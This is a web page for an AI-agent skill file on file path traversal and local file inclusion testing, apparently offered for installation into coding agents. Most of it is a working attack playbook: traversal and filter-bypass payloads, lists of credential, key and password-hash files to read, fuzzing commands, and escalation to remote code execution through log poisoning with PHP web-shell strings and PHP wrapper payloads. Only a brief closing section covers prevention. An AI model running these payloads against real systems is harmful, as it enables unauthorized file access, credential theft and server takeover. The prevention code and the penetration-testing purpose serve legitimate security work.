File Path Traversal Testing
This skill should be used when the user asks to "test for directory traversal", "exploit path traversal vulnerabilities", "read arbitrary files through web applications", "find LFI vulnerabilities", or "access files outside web root". It provides comprehensive file path traversal attack and testing methodologies.
Best use case
File Path Traversal Testing is best used when you need a repeatable AI agent workflow instead of a one-off prompt.
This skill should be used when the user asks to "test for directory traversal", "exploit path traversal vulnerabilities", "read arbitrary files through web applications", "find LFI vulnerabilities", or "access files outside web root". It provides comprehensive file path traversal attack and testing methodologies.
Teams using File Path Traversal Testing should expect a more consistent output, faster repeated execution, less prompt rewriting.
When to use this skill
- You want a reusable workflow that can be run more than once with consistent structure.
When not to use this skill
- You only need a quick one-off answer and do not need a reusable workflow.
- You cannot install or maintain the underlying files, dependencies, or repository context.
Installation
Claude Code / Cursor / Codex
Manual Installation
- Download SKILL.md from GitHub
- Place it in
.claude/skills/file-path-traversal/SKILL.mdinside your project - Restart your AI agent — it will auto-discover the skill
How File Path Traversal Testing Compares
| Feature / Agent | File Path Traversal Testing | Standard Approach |
|---|---|---|
| Platform Support | Not specified | Limited / Varies |
| Context Awareness | High | Baseline |
| Installation Complexity | Unknown | N/A |
Frequently Asked Questions
What does this skill do?
This skill should be used when the user asks to "test for directory traversal", "exploit path traversal vulnerabilities", "read arbitrary files through web applications", "find LFI vulnerabilities", or "access files outside web root". It provides comprehensive file path traversal attack and testing methodologies.
Where can I find the source code?
You can find the source code on GitHub using the link provided at the top of the page.
Related Guides
AI Agents for Coding
Browse AI agent skills for coding, debugging, testing, refactoring, code review, and developer workflows across Claude, Cursor, and Codex.
Best AI Skills for Claude
Explore the best AI skills for Claude and Claude Code across coding, research, workflow automation, documentation, and agent operations.
ChatGPT vs Claude for Agent Skills
Compare ChatGPT and Claude for AI agent skills across coding, writing, research, and reusable workflow execution.
SKILL.md Source
# File Path Traversal Testing
## Purpose
Identify and exploit file path traversal (directory traversal) vulnerabilities that allow attackers to read arbitrary files on the server, potentially including sensitive configuration files, credentials, and source code. This vulnerability occurs when user-controllable input is passed to filesystem APIs without proper validation.
## Prerequisites
### Required Tools
- Web browser with developer tools
- Burp Suite or OWASP ZAP
- cURL for testing payloads
- Wordlists for automation
- ffuf or wfuzz for fuzzing
### Required Knowledge
- HTTP request/response structure
- Linux and Windows filesystem layout
- Web application architecture
- Basic understanding of file APIs
## Outputs and Deliverables
1. **Vulnerability Report** - Identified traversal points and severity
2. **Exploitation Proof** - Extracted file contents
3. **Impact Assessment** - Accessible files and data exposure
4. **Remediation Guidance** - Secure coding recommendations
## Core Workflow
### Phase 1: Understanding Path Traversal
Path traversal occurs when applications use user input to construct file paths:
```php
// Vulnerable PHP code example
$template = "blue.php";
if (isset($_COOKIE['template']) && !empty($_COOKIE['template'])) {
$template = $_COOKIE['template'];
}
include("/home/user/templates/" . $template);
```
Attack principle:
- `../` sequence moves up one directory
- Chain multiple sequences to reach root
- Access files outside intended directory
Impact:
- **Confidentiality** - Read sensitive files
- **Integrity** - Write/modify files (in some cases)
- **Availability** - Delete files (in some cases)
- **Code Execution** - If combined with file upload or log poisoning
### Phase 2: Identifying Traversal Points
Map application for potential file operations:
```bash
# Parameters that often handle files
?file=
?path=
?page=
?template=
?filename=
?doc=
?document=
?folder=
?dir=
?include=
?src=
?source=
?content=
?view=
?download=
?load=
?read=
?retrieve=
```
Common vulnerable functionality:
- Image loading: `/image?filename=23.jpg`
- Template selection: `?template=blue.php`
- File downloads: `/download?file=report.pdf`
- Document viewers: `/view?doc=manual.pdf`
- Include mechanisms: `?page=about`
### Phase 3: Basic Exploitation Techniques
#### Simple Path Traversal
```bash
# Basic Linux traversal
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
# Windows traversal
..\..\..\windows\win.ini
..\..\..\..\windows\system32\drivers\etc\hosts
# URL encoded
..%2F..%2F..%2Fetc%2Fpasswd
..%252F..%252F..%252Fetc%252Fpasswd # Double encoding
# Test payloads with curl
curl "http://target.com/image?filename=../../../etc/passwd"
curl "http://target.com/download?file=....//....//....//etc/passwd"
```
#### Absolute Path Injection
```bash
# Direct absolute path (Linux)
/etc/passwd
/etc/shadow
/etc/hosts
/proc/self/environ
# Direct absolute path (Windows)
C:\windows\win.ini
C:\windows\system32\drivers\etc\hosts
C:\boot.ini
```
### Phase 4: Bypass Techniques
#### Bypass Stripped Traversal Sequences
```bash
# When ../ is stripped once
....//....//....//etc/passwd
....\/....\/....\/etc/passwd
# Nested traversal
..././..././..././etc/passwd
....//....//etc/passwd
# Mixed encoding
..%2f..%2f..%2fetc/passwd
%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
```
#### Bypass Extension Validation
```bash
# Null byte injection (older PHP versions)
../../../etc/passwd%00.jpg
../../../etc/passwd%00.png
# Path truncation
../../../etc/passwd...............................
# Double extension
../../../etc/passwd.jpg.php
```
#### Bypass Base Directory Validation
```bash
# When path must start with expected directory
/var/www/images/../../../etc/passwd
# Expected path followed by traversal
images/../../../etc/passwd
```
#### Bypass Blacklist Filters
```bash
# Unicode/UTF-8 encoding
..%c0%af..%c0%af..%c0%afetc/passwd
..%c1%9c..%c1%9c..%c1%9cetc/passwd
# Overlong UTF-8 encoding
%c0%2e%c0%2e%c0%af
# URL encoding variations
%2e%2e/
%2e%2e%5c
..%5c
..%255c
# Case variations (Windows)
....\\....\\etc\\passwd
```
### Phase 5: Linux Target Files
High-value files to target:
```bash
# System files
/etc/passwd # User accounts
/etc/shadow # Password hashes (root only)
/etc/group # Group information
/etc/hosts # Host mappings
/etc/hostname # System hostname
/etc/issue # System banner
# SSH files
/root/.ssh/id_rsa # Root private key
/root/.ssh/authorized_keys # Authorized keys
/home/<user>/.ssh/id_rsa # User private keys
/etc/ssh/sshd_config # SSH configuration
# Web server files
/etc/apache2/apache2.conf
/etc/nginx/nginx.conf
/etc/apache2/sites-enabled/000-default.conf
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/nginx/access.log
# Application files
/var/www/html/config.php
/var/www/html/wp-config.php
/var/www/html/.htaccess
/var/www/html/web.config
# Process information
/proc/self/environ # Environment variables
/proc/self/cmdline # Process command line
/proc/self/fd/0 # File descriptors
/proc/version # Kernel version
# Common application configs
/etc/mysql/my.cnf
/etc/postgresql/*/postgresql.conf
/opt/lampp/etc/httpd.conf
```
### Phase 6: Windows Target Files
Windows-specific targets:
```bash
# System files
C:\windows\win.ini
C:\windows\system.ini
C:\boot.ini
C:\windows\system32\drivers\etc\hosts
C:\windows\system32\config\SAM
C:\windows\repair\SAM
# IIS files
C:\inetpub\wwwroot\web.config
C:\inetpub\logs\LogFiles\W3SVC1\
# Configuration files
C:\xampp\apache\conf\httpd.conf
C:\xampp\mysql\data\mysql\user.MYD
C:\xampp\passwords.txt
C:\xampp\phpmyadmin\config.inc.php
# User files
C:\Users\<user>\.ssh\id_rsa
C:\Users\<user>\Desktop\
C:\Documents and Settings\<user>\
```
### Phase 7: Automated Testing
#### Using Burp Suite
```
1. Capture request with file parameter
2. Send to Intruder
3. Mark file parameter value as payload position
4. Load path traversal wordlist
5. Start attack
6. Filter responses by size/content for success
```
#### Using ffuf
```bash
# Basic traversal fuzzing
ffuf -u "http://target.com/image?filename=FUZZ" \
-w /usr/share/wordlists/traversal.txt \
-mc 200
# Fuzzing with encoding
ffuf -u "http://target.com/page?file=FUZZ" \
-w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt \
-mc 200,500 -ac
```
#### Using wfuzz
```bash
# Traverse to /etc/passwd
wfuzz -c -z file,/usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt \
--hc 404 \
"http://target.com/index.php?file=FUZZ"
# With headers/cookies
wfuzz -c -z file,traversal.txt \
-H "Cookie: session=abc123" \
"http://target.com/load?path=FUZZ"
```
### Phase 8: LFI to RCE Escalation
#### Log Poisoning
```bash
# Inject PHP code into logs
curl -A "<?php system(\$_GET['cmd']); ?>" http://target.com/
# Include Apache log file
curl "http://target.com/page?file=../../../var/log/apache2/access.log&cmd=id"
# Include auth.log (SSH)
# First: ssh '<?php system($_GET["cmd"]); ?>'@target.com
curl "http://target.com/page?file=../../../var/log/auth.log&cmd=whoami"
```
#### Proc/self/environ
```bash
# Inject via User-Agent
curl -A "<?php system('id'); ?>" \
"http://target.com/page?file=/proc/self/environ"
# With command parameter
curl -A "<?php system(\$_GET['c']); ?>" \
"http://target.com/page?file=/proc/self/environ&c=whoami"
```
#### PHP Wrapper Exploitation
```bash
# php://filter - Read source code as base64
curl "http://target.com/page?file=php://filter/convert.base64-encode/resource=config.php"
# php://input - Execute POST data as PHP
curl -X POST -d "<?php system('id'); ?>" \
"http://target.com/page?file=php://input"
# data:// - Execute inline PHP
curl "http://target.com/page?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjJ10pOyA/Pg==&c=id"
# expect:// - Execute system commands
curl "http://target.com/page?file=expect://id"
```
### Phase 9: Testing Methodology
Structured testing approach:
```bash
# Step 1: Identify potential parameters
# Look for file-related functionality
# Step 2: Test basic traversal
../../../etc/passwd
# Step 3: Test encoding variations
..%2F..%2F..%2Fetc%2Fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
# Step 4: Test bypass techniques
....//....//....//etc/passwd
..;/..;/..;/etc/passwd
# Step 5: Test absolute paths
/etc/passwd
# Step 6: Test with null bytes (legacy)
../../../etc/passwd%00.jpg
# Step 7: Attempt wrapper exploitation
php://filter/convert.base64-encode/resource=index.php
# Step 8: Attempt log poisoning for RCE
```
### Phase 10: Prevention Measures
Secure coding practices:
```php
// PHP: Use basename() to strip paths
$filename = basename($_GET['file']);
$path = "/var/www/files/" . $filename;
// PHP: Validate against whitelist
$allowed = ['report.pdf', 'manual.pdf', 'guide.pdf'];
if (in_array($_GET['file'], $allowed)) {
include("/var/www/files/" . $_GET['file']);
}
// PHP: Canonicalize and verify base path
$base = "/var/www/files/";
$realBase = realpath($base);
$userPath = $base . $_GET['file'];
$realUserPath = realpath($userPath);
if ($realUserPath && strpos($realUserPath, $realBase) === 0) {
include($realUserPath);
}
```
```python
# Python: Use os.path.realpath() and validate
import os
def safe_file_access(base_dir, filename):
# Resolve to absolute path
base = os.path.realpath(base_dir)
file_path = os.path.realpath(os.path.join(base, filename))
# Verify file is within base directory
if file_path.startswith(base):
return open(file_path, 'r').read()
else:
raise Exception("Access denied")
```
## Quick Reference
### Common Payloads
| Payload | Target |
|---------|--------|
| `../../../etc/passwd` | Linux password file |
| `..\..\..\..\windows\win.ini` | Windows INI file |
| `....//....//....//etc/passwd` | Bypass simple filter |
| `/etc/passwd` | Absolute path |
| `php://filter/convert.base64-encode/resource=config.php` | Source code |
### Target Files
| OS | File | Purpose |
|----|------|---------|
| Linux | `/etc/passwd` | User accounts |
| Linux | `/etc/shadow` | Password hashes |
| Linux | `/proc/self/environ` | Environment vars |
| Windows | `C:\windows\win.ini` | System config |
| Windows | `C:\boot.ini` | Boot config |
| Web | `wp-config.php` | WordPress DB creds |
### Encoding Variants
| Type | Example |
|------|---------|
| URL Encoding | `%2e%2e%2f` = `../` |
| Double Encoding | `%252e%252e%252f` = `../` |
| Unicode | `%c0%af` = `/` |
| Null Byte | `%00` |
## Constraints and Limitations
### Permission Restrictions
- Cannot read files application user cannot access
- Shadow file requires root privileges
- Many files have restrictive permissions
### Application Restrictions
- Extension validation may limit file types
- Base path validation may restrict scope
- WAF may block common payloads
### Testing Considerations
- Respect authorized scope
- Avoid accessing genuinely sensitive data
- Document all successful access
## Troubleshooting
| Problem | Solutions |
|---------|-----------|
| No response difference | Try encoding, blind traversal, different files |
| Payload blocked | Use encoding variants, nested sequences, case variations |
| Cannot escalate to RCE | Check logs, PHP wrappers, file upload, session poisoning |Related Skills
web-security-testing
Web application security testing workflow for OWASP Top 10 vulnerabilities including injection, XSS, authentication flaws, and access control issues.
api-security-testing
API security testing workflow for REST and GraphQL APIs covering authentication, authorization, rate limiting, input validation, and security best practices.
python-testing-patterns
Implement comprehensive testing strategies with pytest, fixtures, mocking, and test-driven development. Use when writing Python tests, setting up test suites, or implementing testing best practices.
k6-load-testing
Comprehensive k6 load testing skill for API, browser, and scalability testing. Write realistic load scenarios, analyze results, and integrate with CI/CD.
javascript-testing-patterns
Comprehensive guide for implementing robust testing strategies in JavaScript/TypeScript applications using modern testing frameworks and best practices.
e2e-testing-patterns
Build reliable, fast, and maintainable end-to-end test suites that provide confidence to ship code quickly and catch regressions before users do.
Cross-Site Scripting and HTML Injection Testing
This skill should be used when the user asks to "test for XSS vulnerabilities", "perform cross-site scripting attacks", "identify HTML injection flaws", "exploit client-side injection vulnerabilities", "steal cookies via XSS", or "bypass content security policies". It provides comprehensive techniques for detecting, exploiting, and understanding XSS and HTML injection attack vectors in web applications.
WordPress Penetration Testing
This skill should be used when the user asks to "pentest WordPress sites", "scan WordPress for vulnerabilities", "enumerate WordPress users, themes, or plugins", "exploit WordPress vulnerabilities", or "use WPScan". It provides comprehensive WordPress security assessment methodologies.
SSH Penetration Testing
This skill should be used when the user asks to "pentest SSH services", "enumerate SSH configurations", "brute force SSH credentials", "exploit SSH vulnerabilities", "perform SSH tunneling", or "audit SSH security". It provides comprehensive SSH penetration testing methodologies and techniques.
SQLMap Database Penetration Testing
This skill should be used when the user asks to "automate SQL injection testing," "enumerate database structure," "extract database credentials using sqlmap," "dump tables and columns from a vulnerable database," or "perform automated database penetration testing." It provides comprehensive guidance for using SQLMap to detect and exploit SQL injection vulnerabilities.
SQL Injection Testing
This skill should be used when the user asks to "test for SQL injection vulnerabilities", "perform SQLi attacks", "bypass authentication using SQL injection", "extract database information through injection", "detect SQL injection flaws", or "exploit database query vulnerabilities". It provides comprehensive techniques for identifying, exploiting, and understanding SQL injection attack vectors across different database systems.
SMTP Penetration Testing
This skill should be used when the user asks to "perform SMTP penetration testing", "enumerate email users", "test for open mail relays", "grab SMTP banners", "brute force email credentials", or "assess mail server security". It provides comprehensive techniques for testing SMTP server security.